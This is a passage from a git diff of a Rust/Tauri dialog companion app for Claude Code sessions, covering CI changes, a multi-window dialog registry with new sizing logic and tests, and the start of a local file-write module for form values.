diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml
index 756fc8f..e3aff4d 100644
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -25,10 +25,22 @@ jobs:
             target: aarch64-apple-darwin
             label: macOS arm64
             build_bundle: false
+            run_tests: true
           - os: windows-latest
             target: x86_64-pc-windows-msvc
             label: Windows x86_64
             build_bundle: true
+            # Compile+link the tests but do NOT execute them on Windows.
+            # The freshly-linked `aiui_lib` test binary crashes at *load*
+            # with STATUS_ENTRYPOINT_NOT_FOUND (0xc0000139) on the GH
+            # windows-latest runner — a loader artifact of the large test
+            # binary, not a logic failure (build, clippy and the NSIS bundle
+            # all pass; identical dependency graph to the green macOS/main
+            # build; no Windows FFI added). aiui ships macOS-only and the
+            # Windows port is WIP; the Windows unit-test-binary loader crash (#141)
+            # is tracked separately. We still validate that all code + tests
+            # *compile and link* on Windows via `--no-run`.
+            run_tests: false
     steps:
       - uses: actions/checkout@v4
 
@@ -63,10 +75,20 @@ jobs:
         working-directory: companion/src-tauri
         run: cargo check --release --target ${{ matrix.target }}
 
-      - name: Cargo test
+      - name: Cargo test (run)
+        if: matrix.run_tests
         working-directory: companion/src-tauri
         run: cargo test --lib --release --target ${{ matrix.target }}
 
+      # Windows: compile + link the test binary (real coverage that the code
+      # and tests build on Windows) but skip execution — the test binary
+      # crashes at load on the runner (see the `run_tests: false` matrix
+      # comment; tracked as #141). `--no-run` stops before that loader crash.
+      - name: Cargo test (compile only)
+        if: ${{ !matrix.run_tests }}
+        working-directory: companion/src-tauri
+        run: cargo test --lib --release --target ${{ matrix.target }} --no-run
+
       - name: Cargo clippy
         working-directory: companion/src-tauri
         run: cargo clippy --release --target ${{ matrix.target }} -- -D warnings
diff --git a/.gitignore b/.gitignore
index d3c1fcb..6630e2f 100644
--- a/.gitignore
+++ b/.gitignore
@@ -6,6 +6,15 @@ companion/src-tauri/gen/schemas/
 # deps
 companion/node_modules/
 
+# python
+__pycache__/
+*.pyc
+.pytest_cache/
+python/uv.lock
+python/.venv/
+python/dist/
+*.egg-info/
+
 # packaged release
 aiui-*.zip
 aiui-*.dmg
diff --git a/companion/src-tauri/Cargo.lock b/companion/src-tauri/Cargo.lock
index c400cc2..aab30fd 100644
--- a/companion/src-tauri/Cargo.lock
+++ b/companion/src-tauri/Cargo.lock
@@ -30,7 +30,7 @@ dependencies = [
 
 [[package]]
 name = "aiui"
-version = "0.4.46"
+version = "0.8.1"
 dependencies = [
  "axum",
  "base64 0.22.1",
@@ -1838,6 +1838,12 @@ dependencies = [
  "pin-project-lite",
 ]
 
+[[package]]
+name = "http-range-header"
+version = "0.4.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "9171a2ea8a68358193d15dd5d70c1c10a2afc3e7e4c5bc92bc9f025cebd7359c"
+
 [[package]]
 name = "httparse"
 version = "1.10.1"
@@ -2431,6 +2437,16 @@ version = "0.3.17"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "6877bb514081ee2a7ff5ef9de3281f14a4dd4bceac4c09388074a6b5df8a139a"
 
+[[package]]
+name = "mime_guess"
+version = "2.0.5"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "f7c44f8e672c00fe5308fa235f821cb4198414e1c77935c1ab6948d3fd78550e"
+dependencies = [
+ "mime",
+ "unicase",
+]
+
 [[package]]
 name = "minisign-verify"
 version = "0.2.5"
@@ -5163,14 +5179,24 @@ checksum = "d4e6559d53cc268e5031cd8429d05415bc4cb4aefc4aa5d6cc35fbf5b924a1f8"
 dependencies = [
  "bitflags 2.11.1",
  "bytes",
+ "futures-core",
  "futures-util",
  "http",
  "http-body",
+ "http-body-util",
+ "http-range-header",
+ "httpdate",
  "iri-string",
+ "mime",
+ "mime_guess",
+ "percent-encoding",
  "pin-project-lite",
+ "tokio",
+ "tokio-util",
  "tower",
  "tower-layer",
  "tower-service",
+ "tracing",
 ]
 
 [[package]]
@@ -5309,6 +5335,12 @@ dependencies = [
  "unic-common",
 ]
 
+[[package]]
+name = "unicase"
+version = "2.9.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "dbc4bc3a9f746d862c45cb89d705aa10f187bb96c76001afab07a0d35ce60142"
+
 [[package]]
 name = "unicode-ident"
 version = "1.0.24"
diff --git a/companion/src-tauri/Cargo.toml b/companion/src-tauri/Cargo.toml
index 69a8acf..4edc43b 100644
--- a/companion/src-tauri/Cargo.toml
+++ b/companion/src-tauri/Cargo.toml
@@ -1,6 +1,6 @@
 [package]
 name = "aiui"
-version = "0.4.46"
+version = "0.8.1"
 description = "aiui companion — renders dialogs for remote Claude Code sessions"
 authors = ["byte5"]
 license = ""
@@ -39,7 +39,7 @@ log = "0.4"
 tokio = { version = "1", features = ["full"] }
 axum = "0.7"
 tower = "0.5"
-tower-http = { version = "0.6", features = ["cors"] }
+tower-http = { version = "0.6", features = ["cors", "fs"] }
 uuid = { version = "1", features = ["v4", "serde"] }
 dirs = "5"
 rand = "0.8"
diff --git a/companion/src-tauri/src/dialog.rs b/companion/src-tauri/src/dialog.rs
index e0684af..59d906e 100644
--- a/companion/src-tauri/src/dialog.rs
+++ b/companion/src-tauri/src/dialog.rs
@@ -14,6 +14,18 @@ pub struct DialogRequest {
     /// auto-cancel slightly before the backend sweeps. Single source
     /// of truth for "how long the user has" is here in Rust. v0.4.41.
     pub ttl_secs: u64,
+    /// Human-legible session label the caller passed (project name, task,
+    /// etc.) so the user can tell which session a dialog belongs to when
+    /// several are open at once (Invariant I8). `None` if the caller passed
+    /// nothing — the window then falls back to `session_origin` + short id.
+    #[serde(default, skip_serializing_if = "Option::is_none")]
+    pub session: Option<String>,
+    /// Origin host of the caller, auto-injected by the remote Python bridge
+    /// (its `hostname`) since the Mac can't distinguish remotes sharing
+    /// `:7777`. `None`/absent for local callers. Shown in the window chrome
+    /// alongside `session` (I8).
+    #[serde(default, skip_serializing_if = "Option::is_none")]
+    pub session_origin: Option<String>,
 }
 
 #[derive(Debug, Clone, Serialize, Deserialize)]
@@ -50,10 +62,12 @@ pub const DIALOG_HARD_CAP: usize = 16;
 struct PendingEntry {
     /// Resolves the `/render` waiter once the user submits or cancels.
     result_tx: oneshot::Sender<DialogResult>,
-    /// Resolves the per-render ack waiter the first time the frontend
-    /// confirms it received `dialog:show`. Wrapped in `Option` so we can
-    /// take it out exactly once.
-    ack_tx: Option<oneshot::Sender<()>>,
+    /// The full request payload (spec, ttl, session chrome). Stored so the
+    /// per-id dialog window can *pull* it on mount via `get_dialog_spec`
+    /// (Step 4 multi-window) instead of the backend emitting + waiting for an
+    /// ack — the pull model removes the event-ordering race the old
+    /// `dialog:show` + `dialog_window_ready` handshake existed to paper over.
+    request: DialogRequest,
     created_at: Instant,
 }
 
@@ -98,6 +112,37 @@ pub fn estimate_dialog_size(spec: &serde_json::Value) -> (f64, f64) {
     let mut width = BASE_W;
     let mut content_h: f64 = 0.0;
 
+    // Gallery has no form `fields`; it is a grid of item cards. Size by
+    // item count and column layout so a batch review opens roomy.
+    if spec.get("kind").and_then(|v| v.as_str()) == Some("gallery") {
+        let items = spec
+            .get("items")
+            .and_then(|v| v.as_array())
+            .map(|a| a.len())
+            .unwrap_or(0);
+        let cols = spec
+            .get("columns")
+            .and_then(|v| v.as_u64())
+            .filter(|&c| c > 0)
+            .unwrap_or(if items >= 4 { 3 } else { 2 })
+            .max(1);
+        let w = match cols {
+            1 => BASE_W,
+            2 => 680.0,
+            3 => 880.0,
+            _ => MAX_W,
+        };
+        let rows = ((items as f64) / (cols as f64)).ceil();
+        // Each card ≈ thumbnail (200) + label/detail + action row + optional comment.
+        let per_card = if spec.get("comment").and_then(|v| v.as_bool()).unwrap_or(false) {
+            330.0
+        } else {
+            290.0
+        };
+        let needed = CHROME_H + (rows * per_card).max(per_card);
+        return (w.min(MAX_W), needed.clamp(BASE_H, MAX_H));
+    }
+
     if let Some(tabs) = spec.get("tabs").and_then(|v| v.as_array()) {
         if !tabs.is_empty() {
             content_h += 40.0;
@@ -185,6 +230,64 @@ pub fn estimate_dialog_size(spec: &serde_json::Value) -> (f64, f64) {
     (width.min(MAX_W), height)
 }
 
+/// Agent-facing start-size presets, in logical px. Any dialog spec may pass
+/// `size: "s" | "m" | "l"` (also `"small"`/`"medium"`/`"large"`; trimmed,
+/// case-insensitive) for a roomier start. Comfortable defaults for a typical
+/// laptop screen; the real upper bound is the build-time work-area clamp.
+fn size_preset(name: &str) -> Option<(f64, f64)> {
+    match name.trim().to_ascii_lowercase().as_str() {
+        "s" | "small" => Some((520.0, 480.0)),
+        "m" | "medium" => Some((760.0, 620.0)),
+        "l" | "large" => Some((1040.0, 820.0)),
+        _ => None,
+    }
+}
+
+/// Hard ceiling for an *explicit* `width`/`height` hint, independent of the
+/// auto-estimate's own cap. The monitor-work-area clamp in
+/// `build_dialog_window` is the real upper bound; this just stops a wild
+/// number from constructing an absurd window before that clamp runs.
+const HINT_MAX_W: f64 = 1600.0;
+const HINT_MAX_H: f64 = 1200.0;
+
+/// Resolve the *starting* inner size for a dialog window, combining the
+/// content estimate with an optional agent-supplied size hint.
+///
+/// The hint comes from either explicit `width`/`height` (logical px, take
+/// precedence) or a `size: "s"|"m"|"l"` preset. It acts as a **floor**, not
+/// an override: the window opens at `max(content-estimate, hint)` per
+/// dimension. That means a content-heavy dialog never opens smaller than its
+/// content needs (so `size:"s"` can't cram a 12-image gallery), while a light
+/// dialog *can* be asked to start large (so a sparse form with `size:"l"`
+/// opens roomy instead of at the cramped base size). Addresses the
+/// 2026-05-31 report: dialogs opened too small and users didn't know they
+/// could drag-resize. An unrecognised `size` value falls back to pure
+/// auto-sizing — no error, since the window is resizable regardless.
+pub fn resolve_start_size(spec: &serde_json::Value) -> (f64, f64) {
+    let (auto_w, auto_h) = estimate_dialog_size(spec);
+
+    let explicit_w = spec
+        .get("width")
+        .and_then(|v| v.as_f64())
+        .filter(|w| *w > 0.0);
+    let explicit_h = spec
+        .get("height")
+        .and_then(|v| v.as_f64())
+        .filter(|h| *h > 0.0);
+    let preset = spec
+        .get("size")
+        .and_then(|v| v.as_str())
+        .and_then(size_preset);
+
+    let hint_w = explicit_w.or(preset.map(|p| p.0)).unwrap_or(0.0);
+    let hint_h = explicit_h.or(preset.map(|p| p.1)).unwrap_or(0.0);
+
+    (
+        auto_w.max(hint_w).min(HINT_MAX_W),
+        auto_h.max(hint_h).min(HINT_MAX_H),
+    )
+}
+
 fn collect_visible_fields(spec: &serde_json::Value) -> Vec<&serde_json::Value> {
     let mut out = Vec::new();
     if let Some(tabs) = spec.get("tabs").and_then(|v| v.as_array()) {
@@ -199,16 +302,6 @@ fn collect_visible_fields(spec: &serde_json::Value) -> Vec<&serde_json::Value> {
     out
 }
 
-/// Returned by `try_register` when a dialog is already in flight.
-/// Surfaced via /render as a 409 so the calling agent can distinguish
-/// "companion not reachable" from "companion is busy with someone
-/// else's dialog right now". v0.4.36.
-#[derive(Debug, Clone, Copy)]
-pub struct BusyInfo {
-    pub pending_count: usize,
-    pub oldest_age_secs: u64,
-}
-
 impl DialogState {
     pub fn new() -> Self {
         Self {
@@ -216,30 +309,21 @@ impl DialogState {
         }
     }
 
-    /// Registers a new dialog and returns `(id, result_rx, ack_rx)`. The
-    /// caller is responsible for surfacing the window + emitting the
-    /// `dialog:show` event.
-    ///
-    /// Performs an opportunistic sweep before insert: TTL-expired entries
-    /// are cancelled and removed, and if the hard cap would be exceeded
-    /// the oldest entry is evicted. No background reaper is needed.
-    ///
-    /// As of v0.4.36 the production /render path uses `try_register`
-    /// instead, which rejects rather than evicts when a dialog is
-    /// already in flight. `register` is retained as the
-    /// hard-cap-defense fallback for tests and any future call site
-    /// that legitimately wants eviction semantics.
-    #[allow(dead_code)]
-    pub fn register(
+    /// Register a new dialog and return `(id, result_rx)`. Multi-window
+    /// (Step 4, Invariant I8): N dialogs may be in flight at once — this never
+    /// rejects (the old single-occupancy 409 is gone). It sweeps TTL-expired
+    /// entries and, only if the hard cap would be exceeded, evicts the single
+    /// oldest. The caller (`/render`) builds a per-id window; the window pulls
+    /// the stored `DialogRequest` via [`Self::get_request`] on mount.
+    pub fn register_dialog(
         &self,
-    ) -> (
-        String,
-        oneshot::Receiver<DialogResult>,
-        oneshot::Receiver<()>,
-    ) {
+        spec: serde_json::Value,
+        session: Option<String>,
+        session_origin: Option<String>,
+        ttl_secs: u64,
+    ) -> (String, oneshot::Receiver<DialogResult>) {
         let id = Uuid::new_v4().to_string();
         let (result_tx, result_rx) = oneshot::channel();
-        let (ack_tx, ack_rx) = oneshot::channel();
 
         let mut map = self.pending.lock().unwrap();
 
@@ -279,27 +363,31 @@ impl DialogState {
             }
         }
 
+        let request = DialogRequest {
+            id: id.clone(),
+            spec,
+            ttl_secs,
+            session,
+            session_origin,
+        };
         map.insert(
             id.clone(),
             PendingEntry {
                 result_tx,
-                ack_tx: Some(ack_tx),
+                request,
                 created_at: now,
             },
         );
 
-        (id, result_rx, ack_rx)
+        (id, result_rx)
     }
 
-    /// Marks the dialog with `id` as having been received by the frontend.
-    /// Idempotent: the second call is a silent no-op (oneshot already sent).
-    pub fn ack(&self, id: &str) {
-        let mut map = self.pending.lock().unwrap();
-        if let Some(entry) = map.get_mut(id) {
-            if let Some(tx) = entry.ack_tx.take() {
-                let _ = tx.send(());
-            }
-        }
+    /// Return a clone of the stored request for `id`, for the per-id dialog
+    /// window to pull on mount (Step 4 pull model). `None` if the dialog is
+    /// gone (already resolved, TTL-swept, evicted, or never existed) — the
+    /// window then closes itself.
+    pub fn get_request(&self, id: &str) -> Option<DialogRequest> {
+        self.pending.lock().unwrap().get(id).map(|e| e.request.clone())
     }
 
     pub fn complete(&self, id: &str, result: serde_json::Value) {
@@ -326,94 +414,11 @@ impl DialogState {
         }
     }
 
-    /// Cancel every pending dialog with `reason`, resolving each waiting
-    /// `/render` as cancelled. Returns how many were cancelled. Used by
-    /// the dialog-window X-close handler and the orphan-window sweep
-    /// (v0.4.46, Bug B+) so that tearing the window down *always*
-    /// produces a terminal answer for any in-flight render — never a
-    /// silent hang behind an empty window.
-    pub fn cancel_all(&self, reason: &str) -> usize {
-        let mut map = self.pending.lock().unwrap();
-        let drained: Vec<(String, PendingEntry)> = map.drain().collect();
-        let n = drained.len();
-        for (id, entry) in drained {
-            let _ = entry.result_tx.send(DialogResult {
-                id,
-                cancelled: true,
-                result: serde_json::Value::Null,
-                reason: Some(reason.to_string()),
-            });
-        }
-        n
-    }
-
-    /// Like `register` but rejects with `BusyInfo` if a dialog is already
-    /// in flight after the TTL sweep. Used by `/render` so that two
-    /// parallel callers (multiple aiui calls in one assistant turn,
-    /// two Claude sessions hitting the same companion, a stale window
-    /// from a previous timeout) can't silently overlay each other —
-    /// the second caller gets a clear conflict response instead of
-    /// having its predecessor's dialog evicted underfoot. v0.4.36.
-    ///
-    /// `register` is kept for tests and for any future call site that
-    /// genuinely wants the eviction-based behaviour, but the
-    /// production /render path uses `try_register` exclusively.
-    pub fn try_register(
-        &self,
-    ) -> Result<
-        (
-            String,
-            oneshot::Receiver<DialogResult>,
-            oneshot::Receiver<()>,
-        ),
-        BusyInfo,
-    > {
-        let mut map = self.pending.lock().unwrap();
-
-        // Sweep TTL-expired entries first — those don't count as
-        // "in flight" any more. Same logic as `register`.
-        let now = Instant::now();
-        let expired: Vec<String> = map
-            .iter()
-            .filter(|(_, e)| now.duration_since(e.created_at) > DIALOG_TTL)
-            .map(|(k, _)| k.clone())
-            .collect();
-        for stale_id in expired {
-            if let Some(entry) = map.remove(&stale_id) {
-                let _ = entry.result_tx.send(DialogResult {
-                    id: stale_id,
-                    cancelled: true,
-                    result: serde_json::Value::Null,
-                    reason: Some("ttl_expired".into()),
-                });
-            }
-        }
-
-        if !map.is_empty() {
-            let oldest_age_secs = map
-                .values()
-                .map(|e| now.duration_since(e.created_at).as_secs())
-                .max()
-                .unwrap_or(0);
-            return Err(BusyInfo {
-                pending_count: map.len(),
-                oldest_age_secs,
-            });
-        }
-
-        let id = Uuid::new_v4().to_string();
-        let (result_tx, result_rx) = oneshot::channel();
-        let (ack_tx, ack_rx) = oneshot::channel();
-        map.insert(
-            id.clone(),
-            PendingEntry {
-                result_tx,
-                ack_tx: Some(ack_tx),
-                created_at: now,
-            },
-        );
-        Ok((id, result_rx, ack_rx))
-    }
+    // (Step 4 removed `cancel_all`: multi-window cancels per-id — the
+    // X-close handler cancels the closed window's own dialog by its label-id,
+    // and `sweep_orphan_dialog_window` reaps each orphan window individually.
+    // A blunt "cancel everything" would wrongly tear down other sessions'
+    // live dialogs.)
 
     /// Snapshot for `/health` / diagnostics. Cheap: one mutex acquire.
     pub fn stats(&self) -> DialogStats {
@@ -438,10 +443,14 @@ impl DialogState {
 mod tests {
     use super::*;
 
+    fn reg(s: &DialogState) -> (String, oneshot::Receiver<DialogResult>) {
+        s.register_dialog(serde_json::json!({"kind": "confirm", "title": "?"}), None, None, 0)
+    }
+
     #[test]
     fn register_inserts_entry() {
         let s = DialogState::new();
-        let (id, _rx, _ack) = s.register();
+        let (id, _rx) = reg(&s);
         assert!(!id.is_empty());
         assert_eq!(s.stats().orphan_count, 1);
     }
@@ -449,7 +458,7 @@ mod tests {
     #[test]
     fn complete_resolves_and_removes() {
         let s = DialogState::new();
-        let (id, rx, _ack) = s.register();
+        let (id, rx) = reg(&s);
         s.complete(&id, serde_json::json!({"ok": true}));
         let r = rx.blocking_recv().unwrap();
         assert!(!r.cancelled);
@@ -459,7 +468,7 @@ mod tests {
     #[test]
     fn cancel_resolves_and_removes() {
         let s = DialogState::new();
-        let (id, rx, _ack) = s.register();
+        let (id, rx) = reg(&s);
         s.cancel(&id);
         let r = rx.blocking_recv().unwrap();
         assert!(r.cancelled);
@@ -467,31 +476,32 @@ mod tests {
     }
 
     #[test]
-    fn cancel_all_resolves_every_pending() {
+    fn multiple_dialogs_register_concurrently_no_409() {
+        // Step 4 / I8: single-occupancy is gone — N dialogs coexist.
         let s = DialogState::new();
-        let (_id, rx, _ack) = s.register();
-        let n = s.cancel_all("window_closed");
-        assert_eq!(n, 1);
-        let r = rx.blocking_recv().unwrap();
-        assert!(r.cancelled);
-        assert_eq!(r.reason.as_deref(), Some("window_closed"));
-        assert_eq!(s.stats().orphan_count, 0);
+        let (_a, _ra) = reg(&s);
+        let (_b, _rb) = reg(&s);
+        let (_c, _rc) = reg(&s);
+        assert_eq!(s.stats().orphan_count, 3);
     }
 
     #[test]
-    fn cancel_all_on_empty_is_zero() {
+    fn get_request_returns_stored_payload_then_none_after_resolve() {
         let s = DialogState::new();
-        assert_eq!(s.cancel_all("window_closed"), 0);
-    }
-
-    #[test]
-    fn ack_fires_once() {
-        let s = DialogState::new();
-        let (id, _rx, ack) = s.register();
-        s.ack(&id);
-        ack.blocking_recv().expect("first ack must arrive");
-        // Second ack on the same id is a silent no-op.
-        s.ack(&id);
+        let (id, _rx) = s.register_dialog(
+            serde_json::json!({"kind": "confirm"}),
+            Some("my-project".into()),
+            Some("macmini".into()),
+            42,
+        );
+        let req = s.get_request(&id).expect("request stored for pull");
+        assert_eq!(req.id, id);
+        assert_eq!(req.ttl_secs, 42);
+        assert_eq!(req.session.as_deref(), Some("my-project"));
+        assert_eq!(req.session_origin.as_deref(), Some("macmini"));
+        // Once resolved, the pull returns None so the window closes itself.
+        s.complete(&id, serde_json::json!({}));
+        assert!(s.get_request(&id).is_none());
     }
 
     #[test]
@@ -580,30 +590,99 @@ mod tests {
     }
 
     #[test]
-    fn try_register_succeeds_when_empty() {
-        let s = DialogState::new();
-        let res = s.try_register();
-        assert!(res.is_ok());
-        assert_eq!(s.stats().orphan_count, 1);
+    fn estimate_size_gallery_scales_with_items() {
+        // Few items → narrower 2-col layout, roomy but bounded height.
+        let small = serde_json::json!({
+            "kind": "gallery",
+            "items": [
+                { "value": "a", "src": "data:image/png;base64,AAAA" },
+                { "value": "b", "src": "data:image/png;base64,BBBB" }
+            ]
+        });
+        let (w_small, h_small) = estimate_dialog_size(&small);
+        assert_eq!(w_small, 680.0, "2 items → 2-col → 680 wide");
+        assert!((480.0..=900.0).contains(&h_small));
+
+        // Many items → 3-col grid widens, more rows push height higher.
+        let mut items = Vec::new();
+        for i in 0..9 {
+            items.push(serde_json::json!({ "value": format!("v{i}"), "src": "data:image/png;base64,AAAA" }));
+        }
+        let big = serde_json::json!({ "kind": "gallery", "items": items });
+        let (w_big, h_big) = estimate_dialog_size(&big);
+        assert_eq!(w_big, 880.0, "≥4 items → 3-col → 880 wide");
+        assert!(h_big > h_small, "9 items should be taller than 2, got {h_big} vs {h_small}");
+        assert!(h_big <= 900.0, "must clamp to MAX_H");
     }
 
     #[test]
-    fn try_register_rejects_when_pending() {
-        let s = DialogState::new();
-        let (_id, _rx, _ack) = s.try_register().expect("first try_register");
-        let busy = s.try_register().expect_err("second try_register must be busy");
-        assert_eq!(busy.pending_count, 1);
-        // Registry still holds the original entry.
-        assert_eq!(s.stats().orphan_count, 1);
+    fn estimate_size_gallery_respects_explicit_columns() {
+        let spec = serde_json::json!({
+            "kind": "gallery",
+            "columns": 1,
+            "items": [{ "value": "a" }, { "value": "b" }]
+        });
+        let (w, _h) = estimate_dialog_size(&spec);
+        assert_eq!(w, 520.0, "explicit 1 column → base width");
     }
 
     #[test]
-    fn try_register_succeeds_after_complete() {
-        let s = DialogState::new();
-        let (id, _rx, _ack) = s.try_register().expect("first");
-        s.complete(&id, serde_json::json!({"ok": true}));
-        let res = s.try_register();
-        assert!(res.is_ok());
+    fn resolve_start_size_no_hint_equals_estimate() {
+        let spec = serde_json::json!({ "kind": "confirm", "title": "ok?" });
+        assert_eq!(resolve_start_size(&spec), estimate_dialog_size(&spec));
+    }
+
+    #[test]
+    fn resolve_start_size_preset_floors_a_small_dialog() {
+        // A bare confirm auto-sizes to the base (520×480). Asking for "l"
+        // opens it large instead.
+        let spec = serde_json::json!({ "kind": "confirm", "title": "ok?", "size": "l" });
+        let (w, h) = resolve_start_size(&spec);
+        assert_eq!((w, h), (1040.0, 820.0));
+
+        let spec_m = serde_json::json!({ "kind": "confirm", "title": "ok?", "size": "m" });
+        assert_eq!(resolve_start_size(&spec_m), (760.0, 620.0));
+    }
+
+    #[test]
+    fn resolve_start_size_preset_is_a_floor_not_a_cap() {
+        // 9-item gallery auto-sizes large (880 wide). "s" must NOT shrink it
+        // below what the content needs.
+        let mut items = Vec::new();
+        for i in 0..9 {
+            items.push(serde_json::json!({ "value": format!("v{i}"), "src": "data:image/png;base64,AAAA" }));
+        }
+        let spec = serde_json::json!({ "kind": "gallery", "items": items, "size": "s" });
+        let (auto_w, _) = estimate_dialog_size(&serde_json::json!({
+            "kind": "gallery",
+            "items": (0..9).map(|i| serde_json::json!({"value": format!("v{i}")})).collect::<Vec<_>>()
+        }));
+        let (w, _) = resolve_start_size(&spec);
+        assert!(w >= auto_w, "content estimate must win over a smaller preset: {w} < {auto_w}");
+    }
+
+    #[test]
+    fn resolve_start_size_explicit_dims_override_preset() {
+        let spec = serde_json::json!({
+            "kind": "form", "title": "x", "size": "s", "width": 900, "height": 700
+        });
+        let (w, h) = resolve_start_size(&spec);
+        assert_eq!((w, h), (900.0, 700.0));
+    }
+
+    #[test]
+    fn resolve_start_size_clamps_absurd_explicit_dims() {
+        let spec = serde_json::json!({
+            "kind": "form", "title": "x", "width": 99999, "height": 99999
+        });
+        let (w, h) = resolve_start_size(&spec);
+        assert_eq!((w, h), (1600.0, 1200.0), "explicit dims clamp to HINT_MAX");
+    }
+
+    #[test]
+    fn resolve_start_size_ignores_unknown_preset() {
+        let spec = serde_json::json!({ "kind": "confirm", "title": "ok?", "size": "humongous" });
+        assert_eq!(resolve_start_size(&spec), estimate_dialog_size(&spec));
     }
 
     #[test]
@@ -611,17 +690,19 @@ mod tests {
         let s = DialogState::new();
         let mut rxs = Vec::new();
         for _ in 0..DIALOG_HARD_CAP {
-            let (_id, rx, _ack) = s.register();
+            let (_id, rx) = reg(&s);
             rxs.push(rx);
         }
         assert_eq!(s.stats().orphan_count, DIALOG_HARD_CAP);
 
-        // One more — should evict the oldest.
-        let (_id, _rx, _ack) = s.register();
+        // One more — should evict the oldest (the cap bounds the map; the
+        // 409 single-occupancy that used to reject earlier is gone).
+        let (_id, _rx) = reg(&s);
         assert_eq!(s.stats().orphan_count, DIALOG_HARD_CAP);
 
         // The first registered receiver should now resolve as cancelled.
         let first = rxs.remove(0).blocking_recv().unwrap();
         assert!(first.cancelled);
+        assert_eq!(first.reason.as_deref(), Some("evicted"));
     }
 }
diff --git a/companion/src-tauri/src/filewrite.rs b/companion/src-tauri/src/filewrite.rs
new file mode 100644
index 0000000..3145a4f
--- /dev/null
+++ b/companion/src-tauri/src/filewrite.rs
@@ -0,0 +1,277 @@
+//! Issue #135 — typed input field with file-write (incl. `secret` mode).
+//!
+//! A `form` field may carry an optional `target`: on affirmative submit, aiui
+//! writes the entered value to a file. The write is **always a local file
+//! operation on the host the agent runs on** — because an aiui module already
+//! lives there: the native app on a local Mac session, the Python bridge on a
+//! remote SSH session. Each side writes its own filesystem; the value reaches
+//! the side that needs it over the existing :7777 channel (never via the
+//! agent/LLM). No `scp`, no cross-host write, no atomic-remote-replace
+//! problem — `substitute` is a plain local read-modify-write everywhere.
+//!
+//! This module is the **local writer**, used by the native app for a
+//! Rust-bridge (local Mac) session. The Python bridge has the mirror
+//! implementation for sessions it serves (local-via-uvx or remote). For a
+//! `secret` field the value is written only and never returned to the agent.
+//!
+//! Confused-deputy note: because the write is always local to whichever aiui
+//! module is on the agent's own host, there is **no host parameter** and thus
+//! no way to redirect a write to a foreign host — exfiltration is structurally
+//! impossible. The agent still controls the *path on its own host*, so the
+//! user-visible approval (the affirmative button, with the path shown) remains
+//! the authorization backstop.
+//!
+//! Modes (explicit, never inferred from file existence):
+//! - `create` — write the raw value; refuse to clobber unless `overwrite`.
+//! - `substitute` — replace a `placeholder` that occurs exactly once in an
+//!   existing file (0 or >1 → error, never a partial write). Format-agnostic.
+
+use serde::{Deserialize, Serialize};
+use std::path::{Path, PathBuf};
+
+#[derive(Debug, Clone, Copy, PartialEq, Eq, Deserialize)]
+#[serde(rename_all = "lowercase")]
+pub enum WriteMode {
+    Create,
+    Substitute,
+}
+
+/// Per-field write target, parsed from the spec's `target` object.
+#[derive(Debug, Clone, Deserialize)]
+pub struct Target {
+    pub mode: WriteMode,
+    pub path: String,
+    /// Octal string like "0600". Defaults to 0600 when unset (tight by
+    /// default; harmless for non-secret values too).
+    #[serde(default)]
+    pub perm: Option<String>,
+    /// `create` only: permit clobbering an existing file.
+    #[serde(default)]
+    pub overwrite: bool,
+    /// `substitute` only: the exact token to replace (must occur once).
+    #[serde(default)]
+    pub placeholder: Option<String>,
+}
+
+/// Per-field result handed back to the agent. For a `secret` field the value
+/// is absent by construction — only this status crosses the wire.
+#[derive(Debug, Serialize)]
+pub struct WriteOutcome {
+    pub written: bool,
+    /// Human-legible resolved destination (the absolute local path written).
+    pub target: String,
+    pub bytes: usize,
+    #[serde(skip_serializing_if = "Option::is_none")]
+    pub error: Option<String>,
+}
+
+impl WriteOutcome {
+    fn ok(target: String, bytes: usize) -> Self {
+        Self { written: true, target, bytes, error: None }
+    }
+    fn fail(target: String, error: String) -> Self {
+        Self { written: false, target, bytes: 0, error: Some(error) }
+    }
+    /// A field whose `target` spec couldn't even be parsed — no destination to
+    /// name yet.
+    pub fn invalid(error: String) -> Self {
+        Self { written: false, target: String::new(), bytes: 0, error: Some(error) }
+    }
+}
+
+/// Parse an octal string ("0600", "600", "0o600") into mode bits; `None` if not octal or > 0o7777.
+fn parse_perm(s: &str) -> Option<u32> {
+    let t = s.trim().strip_prefix("0o").unwrap_or_else(|| s.trim());
+    u32::from_str_radix(t, 8).ok().filter(|m| *m <= 0o7777)
+}
+
+/// Sanity guard, not an injection defense (the write goes through `std::fs`,
+/// never a shell): accept only non-empty paths of at most 4096 bytes with no
+/// ASCII control bytes, so the approval string the user sees stays unambiguous.
+pub fn is_sane_target_path(p: &str) -> bool {
+    let fits = (1..=4096).contains(&p.len());
+    fits && !p.bytes().any(|b| b.is_ascii_control())
+}
+
+/// Expand a leading `~/` to the user's home directory. Paths without that
+/// prefix, or when no home directory is known, are returned unchanged.
+fn expand_tilde(p: &str) -> PathBuf {
+    let under_home = |rest: &str| dirs::home_dir().map(|home| home.join(rest));
+    p.strip_prefix("~/")
+        .and_then(under_home)
+        .unwrap_or_else(|| PathBuf::from(p))
+}
+
+/// Atomically write `bytes` to `path` (tmp in the same dir + rename). `perm` is
+/// applied to the still-empty temp file, and a failed chmod aborts the write.
+fn atomic_write(path: &Path, bytes: &[u8], perm: Option<u32>) -> Result<(), String> {
+    // `perm` only applies on Unix (mode bits); Windows inherits default ACLs.
+    // Bind it so clippy -D warnings doesn't flag it unused on non-Unix targets.
+    #[cfg(not(unix))]
+    let _ = perm;
+    let dir = path
+        .parent()
+        .ok_or_else(|| "target has no parent directory".to_string())?;
+    std::fs::create_dir_all(dir).map_err(|e| format!("create dir {}: {e}", dir.display()))?;
+    let tmp = dir.join(format!(".aiui-write-{}.tmp", uuid::Uuid::new_v4()));
+    let outcome = std::fs::File::create(&tmp)
+        .map_err(|e| format!("create temp {}: {e}", tmp.display()))
+        .and_then(|mut f| {
+            use std::io::Write;
+            #[cfg(unix)]
+            if let Some(mode) = perm {
+                use std::os::unix::fs::PermissionsExt;
+                // Fail closed: never put the value in a file we couldn't lock down.
+                f.set_permissions(std::fs::Permissions::from_mode(mode))
+                    .map_err(|e| format!("set permissions on temp: {e}"))?;
+            }
+            f.write_all(bytes).map_err(|e| format!("write temp: {e}"))?;
+            f.sync_all().ok();
+            drop(f);
